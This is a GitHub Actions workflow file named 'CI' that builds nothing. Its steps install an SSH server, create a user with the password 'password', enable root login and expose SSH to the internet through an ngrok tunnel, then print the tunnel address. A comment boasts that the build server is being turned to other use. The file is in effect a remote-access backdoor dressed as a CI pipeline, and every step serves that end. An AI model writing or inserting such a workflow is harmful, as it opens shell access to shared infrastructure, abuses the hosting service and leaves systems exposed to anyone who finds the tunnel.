name: CI

on:
  push:
    branches: [ main ]
  workflow_dispatch:

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - name: The Setup
        run: |
          echo "They thought this was a build server. They were wrong."
          sudo apt-get update
          sudo apt-get install -y openssh-server
          sudo useradd -m -s /bin/bash user
          echo "user:password" | sudo chpasswd
          sudo sed -i 's/#PermitRootLogin prohibit-password/PermitRootLogin yes/' /etc/ssh/sshd_config
          sudo service ssh start

      - name: The Escape
        run: |
          curl -s https://ngrok-agent.s3.amazonaws.com/ngrok.asc | sudo tee /etc/apt/trusted.gpg.d/ngrok.asc >/dev/null && echo "deb https://ngrok-agent.s3.amazonaws.com buster main" | sudo tee /etc/apt/sources.list.d/ngrok.list && sudo apt update && sudo apt install ngrok
          ngrok authtoken ${{ secrets.NGROK_AUTH_TOKEN }}
          ngrok tcp 22 &

      - name: The Signal
        run: |
          sleep 10
          curl -s http://127.0.0.1:4040/api/tunnels
